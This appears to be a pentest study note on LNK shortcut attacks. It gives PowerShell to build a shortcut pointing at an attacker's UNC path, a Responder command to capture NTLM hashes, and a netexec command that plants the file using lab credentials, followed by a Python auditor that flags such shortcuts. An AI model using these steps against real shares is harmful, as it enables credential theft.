LNK File Attacks

An LNK file attack is a type of watering hole attack: we create a malicious shortcut (.lnk) file that points back to our machine, place it inside a shared folder, and then wait for hashes to arrive in Responder.

Manual Attack Setup

Inside an elevated PowerShell session, create the malicious file:

$objShell = New-Object -ComObject WScript.shell
$lnk = $objShell.CreateShortcut("C:\evil.lnk")
$lnk.TargetPath = "\\<YOUR-IP>\@evil.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "evil"
$lnk.HotKey = "Ctrl+Alt+T"
$lnk.Save()

Save the file with an @ symbol at the beginning of the name so that it is listed at the top of the share.

Run Responder

sudo responder -I eth0 -dwv

Automated Attack via Netexec

netexec smb 192.168.138.132 -d pnpt.local -u greg -p Password1 -M slinky -o NAME=evil SERVER=192.168.138.149
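
For the defending side, shortcuts like the ones above can be found by auditing a share for .lnk files that embed a UNC path to a host outside an approved list. The following is an added example, not part of the original notes or of any tool named here; the function names, the allow-list, and the sample bytes are assumptions constructed for illustration, and the byte scan is a heuristic rather than a full LNK parser.

```python
"""Added example: flag .lnk files that embed a UNC path to a non-approved host."""
import re
import tempfile
from pathlib import Path

# HeaderSize (0x4C) + LinkCLSID that open every shell link file (MS-SHLLINK).
LNK_HEADER = bytes.fromhex("4c000000" "0114020000000000c000000000000046")
# \\host\ as ANSI and as UTF-16LE. Files are only read as bytes and never
# resolved, so the auditing machine does not contact the embedded host.
UNC_ANSI = re.compile(rb"\\\\([A-Za-z0-9._-]{1,253})\\")
UNC_UTF16 = re.compile(rb"\\\x00\\\x00((?:[A-Za-z0-9._-]\x00){1,253})\\\x00")


def unc_hosts(data: bytes) -> set:
    """Return the lower-cased host part of every UNC path found in data."""
    hosts = {m.group(1).decode("ascii").lower() for m in UNC_ANSI.finditer(data)}
    hosts |= {m.group(1).decode("utf-16-le").lower() for m in UNC_UTF16.finditer(data)}
    return hosts


def audit_share(root, allowed_hosts):
    """List (path, [hosts]) for shortcuts under root naming hosts not allowed."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() != ".lnk":
            continue
        data = path.read_bytes()
        if not data.startswith(LNK_HEADER):
            continue  # wrong extension or damaged file; not a shell link
        unexpected = sorted(unc_hosts(data) - allowed)
        if unexpected:
            findings.append((str(path), unexpected))
    return findings


# Constructed sample: valid magic/CLSID, zeroed remainder of the 76-byte header,
# then a UTF-16LE UNC string. 192.0.2.10 is a documentation address.
SAMPLE_LNK = LNK_HEADER + bytes(56) + r"\\192.0.2.10\@evil.png".encode("utf-16-le")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as share:  # stands in for the audited share
        Path(share, "@evil.lnk").write_bytes(SAMPLE_LNK)
        Path(share, "docs.lnk").write_bytes(LNK_HEADER + bytes(56) + rb"\\fileserver\docs")
        for path, hosts in audit_share(share, allowed_hosts=["fileserver"]):
            print(f"{path}: unexpected UNC host(s) {hosts}")
```

Run it against a mounted copy of the share and pass the file servers that shortcuts are legitimately expected to reference as allowed_hosts.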